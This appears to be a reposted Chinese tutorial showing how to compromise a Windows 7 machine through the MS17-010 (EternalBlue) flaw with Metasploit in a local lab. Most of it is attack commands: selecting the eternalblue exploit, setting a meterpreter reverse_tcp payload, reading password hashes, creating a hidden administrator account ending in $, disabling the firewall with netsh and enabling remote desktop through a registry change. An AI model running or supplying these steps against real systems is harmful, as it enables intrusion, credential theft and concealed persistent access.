永恆之藍ms17-010 入侵windows系統


准備:

kali為攻擊機,ip:172.17.2.132

win7為靶機, ip:172.17.2.64

使用msf模塊。需要在同一局域網中。

步驟:

1.啟動數據庫服務

service postgresql start

 

 2.開啟msf

 

3.搜索永恆之藍

 

 

 4.使用永恆之藍ms17-010漏洞

use auxiliary/scanner/smb/smb_ms17_010

 

 5.查看選項

show options

 

 6.查看靶機ip地址

 

 172.17.2.64

7.設置rhosts為靶機地址

 

 8.運行run

 

 9.掃描具體的ms17_010(永恆之藍漏洞)

search name:ms17 type:exploit

 

 10.選擇第0個。

use exploit/windows/smb/ms17_010_eternalblue

10(1)如果目標為win2003,則選擇

use exploit/windows/smb/ms17_010_psexec

 

11.查看需要配置的選項。

 

 12.設置rhosts為靶機ip。

 

 13..顯示攻擊載荷。

 

 14.選擇設置windows/x64/meterpreter/reverse_tcp的攻擊載荷

set payload windows/x64/meterpreter/reverse_tcp

 

 15.再次查看配置。

 

 16.檢查無誤后運行

 

 17.運行成功,連接上。help或者?可以打開幫助。

 

 

 18.getuid,獲取靶機賬戶

 

 19.查看靶機的用戶名及密碼,可以看到cover為賬戶,:后的md5為密碼。

 

 

 

如果md5破解不出,可以添加賬戶。

19. shell.

 

 20.看到出現亂碼了,chcp 65001 可以解決。

 

 

21.net user,查看用戶

 

 22.添加qwer用戶 密碼為123456789

 

22(1)

添加隱藏賬戶

net user test$ 123456 /add

提權至管理員賬戶

 

 net localgroup administrators test$ /add

注:

用戶名要以$結尾

添加后,該帳戶可在一定條件下隱藏,輸入net user無法獲取

 23.將qwer提至管理員權限。

 

關閉防火牆
命令:netsh firewall set opmode mode=disable

查看防火牆狀態:netsh firewall show state

 

 

24.安裝遠程桌面軟件

apt-get install rdesktop

 

24.REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f          打開3389遠程連接端口

 

25.在命令符中輸入

rdesktop 172.17.2.64  進入遠程連接。

 隱藏賬戶要加入$

 

 

 連接成功。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM